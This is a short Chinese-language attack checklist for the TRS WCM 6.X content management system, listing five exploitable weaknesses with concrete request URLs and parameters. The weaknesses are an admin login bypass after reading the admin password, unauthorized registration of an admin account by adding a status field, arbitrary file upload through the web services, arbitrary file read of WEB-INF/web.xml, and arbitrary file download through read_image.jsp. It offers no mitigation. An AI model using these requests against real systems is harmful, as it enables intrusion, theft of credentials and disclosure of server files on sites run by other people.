TRS WCM 几处突破点

TRS WCM

1. 管理员登录绕过（6.X）

http://xxx.xxx.xxx/wcm，访问TRS WCM管理后台

查看管理员密码

wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin

按浏览器后退或wcm/app/login.jsp，system用户登录，绕过管理员登录验证。

2. 账号申请（6.X）

wcm/console/auth/reg_newuser.jsp。如果该文件未被删除，则可以注册后台管理账号

直接提交表单，账号需要审核。

因此需要在提交表单时增加status字段或者修改其值。

参见：http://www.wooyun.org/bugs/wooyun-2010-08966

3. 任意文件上传（6.X）

wcm/services，查看系统web service信息。

使用soapUI，可直接上传文件。

4. 任意文件读取

/wcm/center.do?serviceid=wcm6_Default&methodname=forword&_URI_=%2FWEB-INF%2Fweb.xml&PDFWORD=doc&WORDFILE=USERISNG HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://x.x.x.x/wcm/WCMV6/gkml/ebook/export_word.jsp

5. 任意文件下载

wcm/app/system/read_image.jsp?FileName="xxxx",xxxx可以是绝对路径或者相对路径